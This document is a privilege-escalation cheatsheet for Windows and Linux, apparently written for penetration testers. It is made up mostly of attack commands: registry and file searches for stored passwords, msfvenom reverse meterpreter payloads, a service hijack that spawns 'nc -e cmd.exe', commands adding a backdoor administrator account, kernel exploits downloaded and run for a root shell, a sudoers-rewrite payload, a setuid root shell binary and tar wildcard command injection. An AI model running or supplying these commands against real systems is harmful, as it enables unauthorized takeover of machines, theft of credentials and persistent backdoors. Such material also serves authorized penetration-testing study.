Privilege Esclation Cheatsheet via @TheEagerPadawan

privilege-esclation-cheatsheet.md

Privilege Esclation Cheatsheet

Windows

Scripts

• JAWS
• Sherlock
• Powerup

Kernel Exploits

• systeminfo -> look up missing kb's
• systeminfo | findstr /B /C:"OS Name" /C:"OS * Version"
• sherlock -> Find-AllVulns powershell

Common Kernel Exploits

• MS16-014 - applies to: Windows 7 SP1 x86
• MS16-016 - 'WebDAV' applies to Windows 7 SP1 x86 (Build 7601)
• MS16-032 - applies to: Windows 7 x86/x64, Windows 8 x86/64, Windows 10, Windows Server 2008-2012 R2

Config files

• creds in cleartext or base64 -> once windows in installed
• c:\sysprep.inf
• c:\sysprep\sysprep.xml
• %WINDIR%\Panther\Unattend\Unattended.xml
• %WINDIR%\Panther\Unattended.xml

GPP (Group Policy Preferences)

Only applicable for devices connected to a domain

• Groups.xml stored in SYSVOL -> DC
  • encrypted with AES, but key got leaked
  • \\dc2018.lab\SYSVOL\dc2008.lab\Policies\{id}\MACHINE\Preferences\Groups

Other Files

• Services\Services.xml
• ScheduldedTasks\ScheduledTasks.xml
• Printers\Printers.xml
• Drives\Drives.xml
• DataSources\DataSources.xml

Other Misc Passwords

• dir /s *pass* == *cred* == *vnc* == *.config*
• findstr /si password *.xml *.ini *.txt
• reg query HKLM /f password /t REG_SZ /s
• reg query HKCU /f password /t REG_SZ /s
• web.config
• php.ini
• httpd.conf
• access.log
• powerup:
  • Get-WebConfig (ISS > web.config)

putty:

• reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions

Tight VNC:

• reg query HKCU\Software\TightVNC\Server
• bncpwd.exe <encrypted_password>

Always Install Elevated:

• reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstalledElevated
• reg query HKCU\SOFTWARE\Policies\Micorosft\Windows\Installer\AlwaysInstalledElevated
  • both values = 1, created a malicious .msi file with msfvenom for example
  • execute it with msiexec /quiet /qn /i <filename.msi>

powerup:

• Get-RegistryAlwaysInstallElevated
• Write-UserAddMSI

Unquoted Services Paths (trusted service paths)

For each space in a file path, windows will attempt to look for and execute programs with a name that matches the word in front of the space.

Example:

• C:\Program Files\Some Folder\Service.exe
• C:\Program.exe
• C:\Program Files\Some.exe
• C:\Program Files\Some Folder\Service.exe

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

PFNet

• C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfscv.exe
• icalcs "C:\Program Files (x86)\Privacyware"
• msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe

Start and stop the service:

• sc stop PFNet
• sc start PFNET

Powerup:

• Get-ServiceUnquoted
• Write-ServiceBinary -Name <service_name> -Path <hijack_path>

Insecure Service Permissions

• whoami > net user <name> - enumerate groups

• accesschk.exe -> part of sysinternals

• accesschk.exe -ucqv <service name>

• accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Write access to a service as authenticated user?

W-XP ssdprsv and upnphost by default:

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
net start upnphost

Powerup:

• Get-ModifiableService
• Test-ServiceDaclPermission
• Invoke-ServiceAbuse -Name <service_name> -Command <command>

Weak folder permissions

DLL Hijacking

Requires user interaction / reboot.

DLL search order on 32-bit systems:

1. The directory from which the application is loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory
6. Directories in the PATH environment variable

You can use procmon to look for vulnerable dll's using the following filters:

• Result is NAME NOT FOUND Include
• Path ends with .dll

echo %path%
icacls C:\Python27
accesssschk.exe -dqv "C:\Python27"
sc qc IKEEXT

Generate a malicious payload with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f dll > evil.dll

Windows 7 x86/64:

• IKE and AuthIP IPsec Keying Modules (IKEEEXT) - wlbsctrl.dll

Powerup:

• Find-PathDLLHijkack
• Find-ProjcessDLLHijkack
• Wire-HijkackDll

Schedulded tasks:

On server 2000, 2003, and XP, scheduled tasks are running as system. Are they calling any .exe's and can you overwrite?

• accesschk.exe -dqv <folder path>

Can you create a task yourself?

• net start "Task Scheduler" at <hour:minute> /interactive "path to evil exe"

Powerup:

• Get-ModifiableScheduledTaskFile

Useful commands

• hostname
• echo %username%
• whoami / priv
• swinsta - other logged in users
• net users
• net user <username>
• net localgroup
• net localgroup Administrators
• net user rottenadmin P@ssword123! /add
• net localgroup Administrators rottenadmin /add
• ipconfing /all
• route print
• arp -a
• netstat -ano
• C:\WINDOWS\System32\drivers\etc\hosts
• schtasks /query /fo LIST /v - scheduled task
• tasklist /SVC - running processes
• net start - started services
• cd\ & dir /b /s proof.txt

---

Linux

• not added -> ld_preload - URL

Scripts

• Linux-Enum-Mod
• linux-exploit-suggestor

Kernel Exploits

• uname -a -> searchsploit
• linux-exploit-suggestor

Common Kernel Exploits

• CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
  • ExploitDB URL

wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
$ gcc i-can-haz-modharden.c -o i-can-haz-modharden
$ ./i-can-haz-modharden
[+] launching root shell!
# id
uid=0(root) gid=0(root)

• CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
  • ExploitDB URL
• CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
  • CVE URL

wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper

• CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
  • URL

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Services Running as root

• ps -aux | grep root
• any shell escape sequences?

SUID Executables

• runs with permissions of the owner
• find / -perm -u=s -type f 2>/dev/null
• any shell escape sequences - do we have write access?

Sudo rights / users

• sudo -l
• what can we execute -> any shell escape sequences

Cron jobs

• find / -perm -2 -type f 2>/dev/null
• ls -la /etc/cron.d

# rootme.c
int main(void)
{
  setgid(0);
  setuid(0);
  execl("/bin/sh", "sh", 0);
}

gcc rootme.c -o rootme

echo "chown root:root /tmp/rootme; chmod u+s /tmp/rootme;" > /usr/local/sbin/cron-logrotate.sh

Wildcards

• often combined with user interaction / cronjobs
• cfr. Back to the Future: Unix Wildcards Gone Wild paper
• wild cards can be utilized to inject arbitrary command by creating files that are seen as commands

Example:

--checkpoint=<number> and --checkpoint-action=<command>
--checkpoint=1 and --checkpoint-actionexec=sh rshell.sh

Path Abuse ('.' in path)

Requires user interaction (eg somebody need to have . in their path)

• $PATH:.:${PATH}
• export $PATH
• echo $PATH
• replace executable files with a malicious one

Useful commands

• ps aux | grep root
• crontab -l
• ifconfig -a
• cat /etc/resolv.conf
• netstat -tulpn
• arp -e
• route
• id
• who
• cat /etc/passwd | cut -d: -f1 - list of users
• cat ~/.ssh
• find . -name package.json -print -exec cat {} +

Sources

• https://www.fuzzysecurity.com/tutorials/16.html
• https://toshellandback.com/2015/11/24/ms-priv-esc/
• https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
• https://payatu.com/guide-linux-privilege-escalation/#
• https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
• https://github.com/sagishahar/lpeworkshop